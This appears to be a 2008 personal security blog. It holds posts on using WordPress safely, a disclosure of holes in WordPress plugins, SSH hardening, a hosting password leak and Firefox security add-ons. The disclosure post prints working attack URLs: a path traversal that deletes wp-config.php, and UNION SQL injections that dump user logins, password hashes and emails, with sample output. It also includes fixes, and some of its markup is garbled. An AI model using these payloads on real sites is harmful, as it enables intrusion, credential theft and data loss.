Using WordPress Securely

This post is written for blog readers and blog owners. I am not an expert, only a user. If you find any mistakes or you have some ideas, please feel free to tell me.

For blog readers

Do not register

Most of blogs allow non-member to comment, so I can see no reason to register.

How many of blogs you know which support HTTP over SSL? Without the support, your password or cookie (hash-hash-hash of password) are in clear text. Your classmates, roommates, colleagues, unencrypted wifi co-users, bother(s), sister(s) (don’t underestimate females), boy/girl friend(s) (plural is possible, nowadays) or someone who helps pass the notes probably are enjoying them.

It’s easy to know whether the blog web server support SSL or not: a) check address bar, if you read https, then that’s it; or b) read the HTML source, check the login form’s action attribute, if there is https in it, then that’s it.

However, the SSL support may only be used in logging process by default meaning your cookie may still be sent insecurely afterwards (and cookie need to be specified with secure attribute). Although, you can forcedly use https to visit throughout whole session, but the unauthenticated content may not be loaded.

If someone gets your cookies, they can log in and do whatever you can, like changing password (I wonder why WordPress doesn’t request your old password?) No need to mention what if they get your password.

Do you know the blog owner?

How do you know s/he didn’t modify WordPress core file? (actually, that only need one line or two, then s/he can get your password while you are registering/logging in)

If you really need to register, please must use a unique and special password for each blog.

Once again, password matters

You probably think even someone gets the hash of my password is OK, at least they don’t have my password in clear text. That’s completely true, if you use lazy password! I personally believe there are some people can recite md5 or sha1 hash of passwords “123” or “abc” from their memory. Yes, some lazy passwords are more complicated than that. But I also heard there is a DVD stores hashes of strings.

For blog owners

Do not allow blog reader to register

Continue reading →

Spotting vulnerabilities of plugins on WordPress Extend

This is first time I trid to find vulnerability of a software, and this is a one-time project (spending too much time to spot). I use WordPress 2.3.3 to test. I exported all plugins from WordPress Extend Plugin repository at 2008-02-05 08:00 to 10:49 and revisions were from r30828 to r30834, 2650 plugins directories.

It’s impossible to check them one by one and I am not a security expert, so I only did

grep -nr "\$wpdb.*\$_GET" * > wpdb-GET.txt

as well as POST, REQUEST and fopen. I think I may not check them all and I only check those are working (some have bugs) and quite new plugins (have updates after 2007) . After I finish GET, I may skip to check fopen.

You probably think I will miss a lot possibilities of vulnerabilities. Yes, the plugin developers may retrieve form data before querying a SQL statement. I can’t check all, if you have time, please check plugins which you are using on you blog and tell me what you find.

Currently I am checking GET and I was planning to finish it before posting this, however the first plugin I spotted a vulnerability has around 100 downloads a day. So I decided to keep updating this post when I get something (Hope I won’t get something in my own plugins).

Few hours past, I still didn’t spot new one. So I will keep an eye on Recently Updated plugins and this becomes an on-going project.

Got my mail?

If you get my mail about you plugins, please check the testing data and secure your plugin. Please must inform me as soon as you fixed the security holes. I will wait at least one week before I release testing data. If I make any mistake to mis-test your plugin, please let me know and I am so sorry.

Suggestions

• Secure SQL statement:
  • Must validate all form data before put them into SQL statement. For example, (int), intval(), is_numeric(), etc.
  • Use $wpdb->escape() to wrapping form data, this function will encode "\\;$%20.',//_/**/+\"- --" into "\\\\;$%20.\\',//_/**/+\\"- --".
  • $wpdb->prepare() is a better way to query
• Always check privilege of users for actions that need higher level permissions
• Remove irrelevant files from repository: such as .cache, .hg, etc
• Don’t let blog owner install files that won’t be used: such as readme.txt, screenshots

Spotted plugins

Currently found 3 plugins with vulnerabilities. Detail testing data will be released as soon as plugins get fixed, or at least one week later after spotted.

lenky-related-links 1.0.2 – Fixed on Feb 12, 2008 in version 1.0.3

Spotted at 2008-02-11T09:02:34+0800. Informed at 2008-02-11T09:07:45+0800 via contact form. As of 2008-02-11T09:02:39+0800, lenky-related-links has 4 downloads.

File deletion

http://test.dfed/wp/wp-content/plugins/lenkyex/cache_del.php?f=../../../../wp-config.php

statpress 1.2.3 – Fixed on Feb 10, 2008 in version 1.2.4

Spotted at 2008-02-06T23:21:21+0800. Informed at 2008-02-07T00:42:49+0800 via contact form. As of 2008-02-06T23:46:52+0800, statpress has 20,631 downloads

No user privilege checking when exporting data

http://test.dfed/wp/wp-admin/index.php?page=statpress&statpress_action=exportnow&from=20080101&to=20080301

Cause – L12 at statpress.php:

if ($_GET['statpress_action'] == 'exportnow') {
    iriStatPressExportNow();
}

This makes a global hole meaning you should be able to export at almost every blog page. Just move this block of code to admin page hooked function shall patch this hole.

SQL Injection

http://test.dfed/wp/wp-admin/index.php?page=statpress&statpress_action=exportnow&from=20080101&to=20080301'%20union%20select%202,concat(user_login,0x2f,user_pass,0x2f,user_email),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20wp_users%20where%20id=1%20and%20id!='

You can remove id=1%20and%20 in order to export all account hash passwords.

Sample of export data:

date;time;ip;urlrequested;agent;referrer;search;nation;os;browser;searchengine;spider;feed
"20080206";"22:49:38";"192.168.1.12";"/wp/";"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.10) Gecko/20071213 Fedora/2.0.0.10-3.fc8 Firefox/2.0.0.10";"";"";"";"Linux";"Firefox 2";"";"";""
"admin/202cb962ac59075b964b07152d234b70/admin@gmail.com";"3";"4";"5";"6";"7";"8";"9";"10";"11";"12";"13";"14"

Cause – same as previous hole with:

function iriStatPressExportNow() {
    global $wpdb;
    $table_name = $wpdb->prefix . "statpress";
    $filename=get_bloginfo('title' )."-statpress_".$_GET['from']."-".$_GET['to'].".csv";
    header('Content-Description: File Transfer');
    header("Content-Disposition: attachment; filename=$filename");
    header('Content-Type: text/plain charset=' . get_option('blog_charset'), true);
    $qry = $wpdb->get_results("SELECT * FROM $table_name WHERE date>='".$_GET['from']."' AND date<='".$_GET&#91;'to'&#93;."';");
&#91;/code&#93;
Validate both <code>$_GET['form']</code> and <code>$_GET['to']</code> to fix.


<h3><a href="http://wordpress.org/extend/plugins/wp-photo-album/">wp-photo-album</a> 1.0 -  Fixed at Feb 7, 2008 6:38 PM in version 1.1</h3>
Spotted at 2008-02-07T02:57:02+0800. Informed at 2008-02-07T03:02:56+0800 via email As of 2008-02-07T02:58:35+0800 wppa has 83 downloads.
<h4>SQL Injection</h4>
<pre>http://test.dfed/wp/?page_id=3&amp;album=1&amp;photo=123456789%20union%20select%20concat(user_login,0x2f,user_pass,0x2f,user_email)%20from%20wp_users%20where%20id=1</pre>
Where <code>photo=123456789</code> is a non-exist photo.

You will get something like
<pre>admin/202cb962ac59075b964b07152d234b70/admin@gmail.com</pre>

Cause - L1001 at <code>wppa.php</code>:
// get the name of a full sized image
function wppa_photo_name($id = '', $return = FALSE) {
    global $wpdb;
    if ($id == '') { $id = $_GET['photo']; }
    $name = $wpdb->get_var("SELECT name FROM " . PHOTO_TABLE . " WHERE id=$id");

Related Posts

• Using WordPress Securely

Securing SSH

This post is about what I have learned for protecting SSH (Secure Shell) from being hacked. Please advise me if I miss or get something wrong.

Username and Password

Do not use common words as your username or password, neither use your username exactly as your password. This applies everything needs your username and password. Read Password strength, if you need a good password. In my opinion, if you need to write down something in somewhere for your password including using softwares, then that’s not a good password. Currently, our brain is the best safety, but not quite liable.

When I saw someone trying to get into my laptop, they usually try names like bob, bill or services’ names; and definitely root. If your name is bob, please don’t feel happy when this username bob is available on a social networking website. You would be a highly possible target.

Using Public Key

Using public key has two benefits: a) you don’t need to type your password, but passphrase may(must, read next) need, b) it has a guarantee of high security strength.

b doesn’t mean you can use lazy password or you won’t be hacked. That only says that it’s *almost* impossible if someone trying to hack your account by guessing or calculating correct keys. But if someone can hack into your account on your computer, then they can get your keys. Maybe they don’t need to, just can get by wrong permissions on directories and files. This is more possible to be ignored by Windows users. Even you protect your files flawlessly, there always is a target for bad people, root. root can do anything. Therefore, you must set a passphrase for your keys. If you haven’t, please run

ssh-keygen -p

to set one. This can ensure your key isn’t in clear text but encrypted.

Generating a Key

Simply follow ssh-keygen. After generating, if you have ssh-copy-id, you can run (Tip from Charles Harris, Thanks!)

ssh-copy-id .ssh/id_rsa.pub username@remote

If you don’t have it, do the following:

Transfer ~/.ssh/id_rsa.pub to remote server (scp would be a good way to transfer), run on remote server

cat id_rsa.pub >> ~/.ssh/authorized_keys
rm id_rsa.pub

On both remote server and local, make sure

chmod 700 ~/.ssh
chmod 600 ~/.ssh/*

Enhancing /etc/ssh/sshd_config

Continue reading →

Hacked due to security leak of hosting company

This post revealed the leak of Dreamhost. 3500 ftp passwords has been stolen and you can’t read any information from Dreamhost’s status or official blog. I am not a customer of Dreamhost. I am happy that I chose bluehost. But this doesn’t mean bluehost won’t be hacked. “Hack” might not be correct because dreamhost didn’t tell how those passwords to be stolen. Maybe that’s an inside job. Of course, they can’t admit if it is because that’s worse than being hacked. We all know ftp password may not only be used for ftp, it could be a password for everything if the user is lazy and is without vigilance.

There is a comment in caydel.com:

They just send a mail to all users who had the password “1234”.

How could Dreamhost know your password? Does that means all passwords are stored without encrypting or decrypting is possible? or many people use “1234” as password and the staff noticed lots of encryption of “1234”.

You can see some ads comments or suggestion of better hosting companies. “Opponent’s leak is benefit.”

Surfing more secure with Firefox

The websites

Yesterday, I found a website made by McAfee called SiteAdvisor. It may give you some information about the site you are visiting or will visit. It provides information about

• email – It checks all forms in target website, if there a possible signing up form with email address. It will sign up with a email address, and count the emails to that email address.
• files – It downloads files from target website, and do scan on files.
• affiliations – A links-map about websites to be linked by target website.
• annoyances – Pop-ups, etc

Here is a sample report. And there is a extension for your firefox. That allows you distinguish websites directly from search engine’s result page are safe or not. If you use Internet Explorer, you can install a plugin, too. But I strongly suggest you use firefox, at least other than Internet Explorer.

And SiteAdvisor taskbar icon shows current website is safe or not. Right now, the number of website SiteAdvisor has already tested is not so many. But you can ask it to test websites you want. But I don’t know when would you get the report.

The passwords

google, yahoo, digg, del.icio.us, myspace, msn… There are hundreds of website you use in daily life. Do you use different password for each website? Do your passwords are strong enough? Will you change your passwords regularly? If your answers for those questions are all YES! I think you are an incredible person.
I will give you a safer solution for your passwords. It’s a extension for Firefox called Password Hasher. Basically your password for a website is generated by two elements, Site tag and Master Key. Site tag is different for different websites. And Master Key could be a single strong password. That is you only need to remember one strong password. Then you can use it to access many website safer. It will add a # button next to the password field for inputing password easily.

P.S. But you must understand strong password doesn’t mean you are really safe. A trojan horse can steal your password, hacking website can get your information(or password). There is no really safety in this world.